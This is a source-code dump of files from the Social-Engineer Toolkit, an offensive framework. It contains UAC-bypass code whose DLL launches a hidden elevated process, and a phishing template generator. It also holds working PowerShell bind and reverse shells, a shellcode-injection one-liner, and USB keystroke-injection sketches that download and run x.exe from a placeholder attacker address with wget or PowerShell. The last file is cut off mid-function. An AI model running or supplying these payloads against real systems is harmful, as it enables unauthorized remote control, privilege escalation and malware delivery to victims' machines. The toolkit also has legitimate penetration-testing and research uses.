!defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU) 24 | #ifdef _WIN32 25 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 26 | #pragma code_page(1252) 27 | #endif //_WIN32 28 | 29 | #ifdef APSTUDIO_INVOKED 30 | ///////////////////////////////////////////////////////////////////////////// 31 | // 32 | // TEXTINCLUDE 33 | // 34 | 35 | 1 TEXTINCLUDE 36 | BEGIN 37 | "resource.h\0" 38 | END 39 | 40 | 2 TEXTINCLUDE 41 | BEGIN 42 | "#ifndef APSTUDIO_INVOKED\r\n" 43 | "#include ""targetver.h""\r\n" 44 | "#endif\r\n" 45 | "#define APSTUDIO_HIDDEN_SYMBOLS\r\n" 46 | "#include ""windows.h""\r\n" 47 | "#undef APSTUDIO_HIDDEN_SYMBOLS\r\0" 48 | END 49 | 50 | 3 TEXTINCLUDE 51 | BEGIN 52 | "#include ""Win7Elevate.rc2\0" 53 | END 54 | 55 | #endif // APSTUDIO_INVOKED 56 | 57 | #endif // English (U.S.) resources 58 | ///////////////////////////////////////////////////////////////////////////// 59 | 60 | 61 | 62 | #ifdef _DEBUG 63 | 64 | #ifdef _WIN64 65 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll" 66 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe" 67 | #else 68 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll" 69 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe" 70 | #endif 71 | 72 | #else // _DEBUG 73 | 74 | #ifdef _WIN64 75 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll" 76 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe" 77 | #else 78 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll" 79 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe" 80 | #endif 81 | 82 | #endif 83 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | Source Files 52 | 53 | 54 | 55 | 56 | Resource Files 57 | 58 | 59 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | false 5 | /c cmd 6 | /c cmd 7 | WindowsLocalDebugger 8 | WindowsLocalDebugger 9 | /c cmd 10 | /c cmd 11 | WindowsLocalDebugger 12 | WindowsLocalDebugger 13 | 14 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate_Inject.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace W7EInject 4 | { 5 | void AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName, 6 | const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir, 7 | const wchar_t *szPathToOurDll, 8 | DWORD (__stdcall *Redirector)(void)); 9 | } 10 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate_Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace W7EUtils 4 | { 5 | bool GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs); 6 | 7 | bool OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName); 8 | 9 | bool GetElevationType(TOKEN_ELEVATION_TYPE * ptet); 10 | 11 | template < typename T > class GetProcAddr 12 | { 13 | public: 14 | T f; 15 | 16 | __forceinline GetProcAddr(FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName), HMODULE hModule, const char *lpProcName) 17 | { 18 | f = reinterpret_cast< T >(fpGetProcAddress(hModule, lpProcName)); 19 | } 20 | }; 21 | 22 | class CTempResource 23 | { 24 | private: 25 | HINSTANCE m_hInstance; 26 | int m_iResourceId; 27 | std::wstring m_strFilePath; 28 | public: 29 | CTempResource(HINSTANCE hInstance, int iResourceId); 30 | virtual ~CTempResource(); 31 | bool GetFilePath(std::wstring &strPath); 32 | }; 33 | 34 | class CRemoteMemory 35 | { 36 | private: 37 | HANDLE m_hRemoteProcess; 38 | std::list< void * > m_listRemoteAllocations; 39 | bool m_bAnyFailures; 40 | 41 | private: 42 | CRemoteMemory(const CRemoteMemory &rhs); // Disallow. 43 | CRemoteMemory &operator=(const CRemoteMemory &rhs); // Disallow. 44 | 45 | public: 46 | CRemoteMemory(HANDLE hRemoteProcess); 47 | virtual ~CRemoteMemory(); 48 | void LeakMemory(); 49 | bool AnyFailures() const; 50 | void *AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst = true); 51 | wchar_t *AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst = true); 52 | char *AllocAndCopyMemory(const char *szLocalString, bool bConst = true); 53 | }; 54 | } 55 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Win7Elevate.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | 11 | #if defined _M_IX86 12 | 13 | #pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"") 14 | 15 | #elif defined _M_X64 16 | 17 | #pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"") 18 | 19 | #endif 20 | 21 | 22 | 23 | #include 24 | 25 | #include 26 | #include 27 | 28 | #include 29 | 30 | #include 31 | #include 32 | #include 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | #ifndef FOFX_REQUIREELEVATION 39 | #define FOFX_REQUIREELEVATION (0x10000000) 40 | #endif 41 | 42 | #ifndef FOFX_DONTDISPLAYLOCATIONS 43 | #define FOFX_DONTDISPLAYLOCATIONS (0x80000000) 44 | #endif 45 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/Win7ElevateDll.cpp: -------------------------------------------------------------------------------- 1 | // Win7ElevateDll.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | 7 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/Win7ElevateDll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/Win7ElevateDll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | 3 | #include 4 | 5 | #include ".\..\CMMN.h" 6 | 7 | #include 8 | #include 9 | 10 | BOOL APIENTRY DllMain( HMODULE hModule, 11 | DWORD ul_reason_for_call, 12 | LPVOID lpReserved 13 | ) 14 | { 15 | // 16 | // Simple stub code that is used to create EXE within a alevated process. 17 | // Wee need to hide fact that we've started process thats why we immediately 18 | // Terminate host application. 19 | // 20 | CLogger::LogLine(TEXT("DLL: Hello")); 21 | 22 | switch (ul_reason_for_call) 23 | { 24 | case DLL_PROCESS_ATTACH: 25 | { 26 | // 27 | // Obtaining TIOR path to be used for CreateProcess call 28 | // 29 | std::wstring cmd; 30 | CInterprocessStorage::GetString( TEXT("w7e_TIORPath"), cmd ); 31 | 32 | STARTUPINFO startupInfo = {0}; 33 | startupInfo.cb = sizeof(startupInfo); 34 | PROCESS_INFORMATION processInfo = {0}; 35 | 36 | CLogger::LogLine(TEXT("DLL: TIOR shell=")); 37 | CLogger::LogLine(cmd); 38 | 39 | // 40 | // Create not visible window 41 | // 42 | if (CreateProcess(cmd.c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW * 1, NULL, NULL, &startupInfo, &processInfo)) 43 | { 44 | CloseHandle(processInfo.hProcess); 45 | CloseHandle(processInfo.hThread); 46 | } 47 | 48 | ExitProcess(-69); 49 | } 50 | break; 51 | case DLL_THREAD_ATTACH: 52 | case DLL_THREAD_DETACH: 53 | case DLL_PROCESS_DETACH: 54 | break; 55 | } 56 | return TRUE; 57 | } 58 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Win7ElevateDll.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | #include 18 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | #include 18 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/x64.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/uac_bypass/x64.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/x86.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/uac_bypass/x86.binary -------------------------------------------------------------------------------- /src/phishing/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/phishing/__init__.py -------------------------------------------------------------------------------- /src/phishing/smtp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/phishing/smtp/__init__.py -------------------------------------------------------------------------------- /src/phishing/smtp/client/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/phishing/smtp/client/__init__.py -------------------------------------------------------------------------------- /src/phishing/smtp/client/custom_template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import random 3 | from src.core import setcore as core 4 | 5 | try: 6 | print ("\n [****] Custom Template Generator [****]\n") 7 | print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!") 8 | author=raw_input(core.setprompt("0", "Name of the author")) 9 | filename=randomgen=random.randrange(1,99999999999999999999) 10 | filename=str(filename)+(".template") 11 | subject=raw_input(core.setprompt("0", "Email Subject")) 12 | try: 13 | body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished")) 14 | while body != 'sdfsdfihdsfsodhdsofh': 15 | try: 16 | body+=(r"\n") 17 | body+=raw_input("Next line of the body: ") 18 | except KeyboardInterrupt: break 19 | except KeyboardInterrupt: pass 20 | filewrite=file("src/templates/%s" % (filename), "w") 21 | filewrite.write("# Author: "+author+"\n#\n#\n#\n") 22 | filewrite.write('SUBJECT='+'"'+subject+'"\n\n') 23 | filewrite.write('BODY='+'"'+body+'"\n') 24 | print "\n" 25 | filewrite.close() 26 | except Exception, e: 27 | print " An error occured, printing error message: "+str(e) 28 | -------------------------------------------------------------------------------- /src/powershell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/powershell/__init__.py -------------------------------------------------------------------------------- /src/powershell/bind.powershell: -------------------------------------------------------------------------------- 1 | # 2 | # PowerShell Bind by Josh Kelley (winfang) and Dave Kennedy (ReL1K) 3 | # Defcon Release 4 | # 5 | # 6 | # 7 | 8 | $encoding = new-object System.Text.AsciiEncoding 9 | $endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "PORTHERE") 10 | $listener = new-object System.Net.Sockets.TcpListener $endpoint 11 | $listener.start() 12 | $socket = $listener.AcceptTcpClient() 13 | $networkstream = $socket.GetStream() 14 | $networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize 15 | $process = New-Object System.Diagnostics.Process 16 | $process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe" 17 | $process.StartInfo.RedirectStandardInput = 1 18 | $process.StartInfo.RedirectStandardOutput = 1 19 | $process.StartInfo.UseShellExecute = 0 20 | $process.Start() 21 | $inputstream = $process.StandardInput 22 | $outputstream = $process.StandardOutput 23 | 24 | Start-Sleep 1 25 | 26 | while($outputstream.Peek() -ne -1){ 27 | $string += $encoding.GetString($outputstream.Read()) 28 | } 29 | $networkstream.Write($encoding.GetBytes($string),0,$string.Length) 30 | $string = '' 31 | $done = $false 32 | while (-not $done) { 33 | $pos = 0 34 | $i = 1 35 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { 36 | $read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) 37 | $pos+=$read 38 | if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) { 39 | break 40 | } 41 | } 42 | if ($pos -gt 0) { 43 | $string = $encoding.GetString($networkbuffer,0,$pos) 44 | $inputstream.write($string) 45 | 46 | # Write Output 47 | $out = $encoding.GetString($outputstream.Read()) 48 | while($outputstream.Peek() -ne -1){ 49 | $out += $encoding.GetString($outputstream.Read()) 50 | } 51 | $networkstream.Write($encoding.GetBytes($out),0,$out.length) 52 | $out = $null 53 | } 54 | else { 55 | $done = $true 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/powershell/reverse.powershell: -------------------------------------------------------------------------------- 1 | function cleanup { 2 | if ($client.Connected -eq $true) {$client.Close()} 3 | if ($process.ExitCode -ne $null) {$process.Close()} 4 | exit} 5 | // Setup IPADDR 6 | $address = 'IPADDRHERE' 7 | // Setup PORT 8 | $port = 'PORTHERE' 9 | $client = New-Object system.net.sockets.tcpclient 10 | $client.connect($address,$port) 11 | $stream = $client.GetStream() 12 | $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize 13 | $process = New-Object System.Diagnostics.Process 14 | $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' 15 | $process.StartInfo.RedirectStandardInput = 1 16 | $process.StartInfo.RedirectStandardOutput = 1 17 | $process.StartInfo.UseShellExecute = 0 18 | $process.Start() 19 | $inputstream = $process.StandardInput 20 | $outputstream = $process.StandardOutput 21 | Start-Sleep 1 22 | $encoding = new-object System.Text.AsciiEncoding 23 | while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} 24 | $stream.Write($encoding.GetBytes($out),0,$out.Length) 25 | $out = $null; $done = $false; $testing = 0; 26 | while (-not $done) { 27 | if ($client.Connected -ne $true) {cleanup} 28 | $pos = 0; $i = 1 29 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { 30 | $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) 31 | $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} 32 | if ($pos -gt 0) { 33 | $string = $encoding.GetString($networkbuffer,0,$pos) 34 | $inputstream.write($string) 35 | start-sleep 1 36 | if ($process.ExitCode -ne $null) {cleanup} 37 | else { 38 | $out = $encoding.GetString($outputstream.Read()) 39 | while($outputstream.Peek() -ne -1){ 40 | $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} 41 | $stream.Write($encoding.GetBytes($out),0,$out.length) 42 | $out = $null 43 | $string = $null}} else {cleanup}} 44 | -------------------------------------------------------------------------------- /src/powershell/shellcode_injection.powershell: -------------------------------------------------------------------------------- 1 | $code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = SHELLCODEHERE;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }; 2 | 3 | -------------------------------------------------------------------------------- /src/qrcode/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/qrcode/__init__.py -------------------------------------------------------------------------------- /src/qrcode/qrgenerator.py: -------------------------------------------------------------------------------- 1 | from src.qrcode.qrcode import * 2 | from src.core.setcore import * 3 | import os 4 | 5 | # generate the qrcode and save it definition 6 | def gen_qrcode(url): 7 | # generate the qrcode 8 | qr = QRCode(5, QRErrorCorrectLevel.L) 9 | qr.addData(url) 10 | qr.make() 11 | im = qr.makeImage() 12 | time.sleep(1) 13 | if os.path.isfile(setdir + "/reports/qrcode_attack.png"): os.remove(setdir + "/reports/qrcode_attack.png") 14 | # save the image out 15 | im.save(setdir + "/reports/qrcode_attack.png", format='png') 16 | # print that its been successful 17 | print_status("QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir)) 18 | -------------------------------------------------------------------------------- /src/teensy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/teensy/__init__.py -------------------------------------------------------------------------------- /src/teensy/gnome_wget.pde: -------------------------------------------------------------------------------- 1 | /** gnome_wget.pde 2 | * 3 | * Author: Hugo Caron (y0ug) 4 | * Date: 2011/03/19 5 | * 6 | * 7 | * Teensy pde for linux with Gnome desktop and wget 8 | * - Open "run an application" window (ALT-F2) 9 | * - Type a cmd who download a file with wget in tmp folder and run 10 | * 11 | * Note: I only test on my laptop under ubuntu 10.10 12 | * 13 | * Based on code of Social-Engineer Toolkit, Teensy Attack Vector 14 | * Thanks to Dave Kennedy (ReL1K) for pde example 15 | * 16 | * ReL1K: Added x.exe extension even though they are elf binaries, won't make a difference 17 | * just easier to note recode and leave it the same. 18 | * 19 | */ 20 | 21 | #define PAYLOAD "/bin/sh -c \"\ 22 | wget -O /tmp/x http://IPADDR/x.exe &&\ 23 | chmod +x /tmp/x && \ 24 | /tmp/x \ 25 | \"" 26 | 27 | void setup() { 28 | delay(5000); 29 | exec_gnome(PAYLOAD); 30 | } 31 | 32 | void loop() { 33 | delay(1000000); 34 | } 35 | 36 | void exec_gnome(char *SomeCommand){ 37 | // Press ALT-F2 ( Gnome - "run an application" window ) 38 | Keyboard.set_modifier(MODIFIERKEY_ALT); 39 | Keyboard.set_key1(KEY_F2); 40 | Keyboard.send_now(); 41 | 42 | // Set blank key 43 | Keyboard.set_modifier(0); 44 | Keyboard.set_key1(0); 45 | Keyboard.send_now(); 46 | 47 | delay(1500); 48 | 49 | // Send the command 50 | Keyboard.print(SomeCommand); 51 | Keyboard.set_key1(KEY_ENTER); 52 | Keyboard.send_now(); 53 | 54 | // Reset key 55 | Keyboard.set_key1(0); 56 | Keyboard.send_now(); 57 | } 58 | -------------------------------------------------------------------------------- /src/teensy/osx_sd2teensy.pde: -------------------------------------------------------------------------------- 1 | /* 2 | Teensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K) 3 | Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile 4 | */ 5 | 6 | // This the Mac version :) This does not execute the code, but it does copy from the SD. 7 | 8 | #include 9 | #include 10 | 11 | // Teensy ++ LED is 6. Teensy the LED is 11. 12 | int ledPin = 6; 13 | 14 | void setup() 15 | { 16 | BlinkFast(2); 17 | delay(5000); 18 | CommandAtSpotlight("Terminal"); 19 | delay(7500); 20 | // Replace file name with evil file 21 | Keyboard.println("nano /tmp/test.txt"); 22 | delay(1000); 23 | // This is the SS pin on the Teensy. Pin 20 on the Teensy ++. Pin 0 on the Teensy. 24 | const int chipSelect = 20; 25 | 26 | // make sure that the default chip select pin is set to 27 | // output, even if you don't use it: 28 | pinMode(10, OUTPUT); 29 | 30 | // see if the card is present and can be initialized: 31 | if (!SD.begin(chipSelect)) { 32 | Serial.println("Card failed, or not present"); 33 | // don't do anything more: 34 | return; 35 | } 36 | 37 | // open the file. note that only one file can be open at a time, 38 | // so you have to close this one before opening another. 39 | // Larger the file, more likely it wouldn't fit in a normal int var. 40 | // This is the workaround for it. 41 | long int filePos; 42 | long int fileSize; 43 | File dataFile = SD.open("converts.txt"); 44 | if (dataFile) { 45 | fileSize = dataFile.size(); 46 | Keyboard.println("Start File"); 47 | for (filePos = 0; filePos <= fileSize; filePos++) { 48 | Keyboard.print(dataFile.read(),BYTE); 49 | // Large files take a while to write out...this delay helps keep the keyboard on tract. 50 | delay(10); 51 | //Serial.print(dataFile.read(),BYTE); 52 | } 53 | dataFile.close(); 54 | Keyboard.println("End File"); 55 | } 56 | else { 57 | Serial.println("error opening converts.txt"); 58 | } 59 | // ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST! 60 | delay(5000); 61 | CtrlX(); 62 | delay(5000); 63 | 64 | // Use Python to convert file back to binary. 65 | // Play with the delays to make everything work right. 66 | Keyboard.println("python"); 67 | delay(1000); 68 | Keyboard.println("import binascii"); 69 | delay(1000); 70 | Keyboard.println("fileopen = file(\"/tmp/converts.txt\", \"rb\")"); 71 | delay(1000); 72 | Keyboard.println("data = fileopen.read()"); 73 | delay(1000); 74 | Keyboard.println("data = binascii.unhexlify(data)"); 75 | delay(1000); 76 | Keyboard.println("filewrite = file(\"/tmp/theconverted.txt\", \"w\")"); 77 | delay(1000); 78 | Keyboard.println("filewrite.write(data)"); 79 | delay(1000); 80 | Keyboard.println("quit()"); 81 | } 82 | 83 | void loop () {} 84 | 85 | void BlinkFast(int BlinkRate){ 86 | // Blinks the light...lets us know we're alive 87 | int BlinkCounter=0; 88 | for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){ 89 | digitalWrite(ledPin, HIGH); 90 | delay(80); 91 | digitalWrite(ledPin, LOW); 92 | delay(80); 93 | } 94 | } 95 | 96 | void CtrlX(){ 97 | // Save a file within Nano 98 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 99 | Keyboard.set_key1(KEY_X); 100 | Keyboard.send_now(); 101 | Keyboard.set_modifier(0); 102 | Keyboard.set_key1(0); 103 | delay(100); 104 | // Press Y to Save 105 | PRES(KEY_Y); 106 | delay(100); 107 | // Press Enter to Accept the file name 108 | PRES(KEY_ENTER); 109 | } 110 | 111 | void CommandAtSpotlight(char *SomeCommand){ 112 | // Open Spotlight and find your program 113 | Keyboard.set_modifier(MODIFIERKEY_GUI); 114 | Keyboard.set_key1(KEY_SPACE); 115 | Keyboard.send_now(); 116 | Keyboard.set_modifier(0); 117 | Keyboard.set_key1(0); 118 | Keyboard.send_now(); 119 | delay(1500); 120 | Keyboard.print(SomeCommand); 121 | PRES(KEY_ENTER); 122 | } 123 | 124 | void PRES(int KeyCode){ 125 | // Press a keyboard button 126 | Keyboard.set_key1(KeyCode); 127 | Keyboard.send_now(); 128 | Keyboard.set_key1(0); 129 | Keyboard.send_now(); 130 | } 131 | -------------------------------------------------------------------------------- /src/teensy/powershell_down.pde: -------------------------------------------------------------------------------- 1 | // 2 | // Social-Engineer Toolkit Teensy Attack Vector 3 | // Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG) 4 | // 5 | // Special thanks to: Irongeek 6 | // 7 | // 2011-02-28 padzero@gmail.com 8 | // * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets 9 | // * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7 10 | // 11 | 12 | char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://IPADDR/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);"; 13 | char *command2 = "%HOMEPATH%\\x.exe"; 14 | 15 | void setup() { 16 | delay(5000); 17 | omg(command1); 18 | delay(15000); 19 | // run this executable 20 | omg(command2); 21 | } 22 | 23 | void loop() {} 24 | 25 | void omg(char *SomeCommand) 26 | { 27 | Keyboard.set_modifier(128); 28 | Keyboard.set_key1(KEY_R); 29 | 